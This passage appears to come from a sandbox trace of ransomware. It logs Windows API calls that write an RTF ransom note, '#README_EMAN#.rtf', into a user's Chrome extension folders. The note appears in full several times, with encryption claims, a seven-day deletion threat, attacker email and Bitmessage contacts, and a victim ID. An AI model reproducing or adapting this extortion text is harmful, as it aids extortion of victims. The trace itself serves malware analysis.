;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x16Ùv#Q\x17ß÷\x1c,\x8eg»`Æ;ø\x89÷\x03%|…s¾", lpUsedDefaultChar=0x0) returned 8717 [0271.643] WriteFile (in: hFile=0x2ec, lpBuffer=0x23698d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23698d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.644] CloseHandle (hObject=0x2ec) returned 1 [0271.644] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0271.644] GetLastError () returned 0x2 [0271.644] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 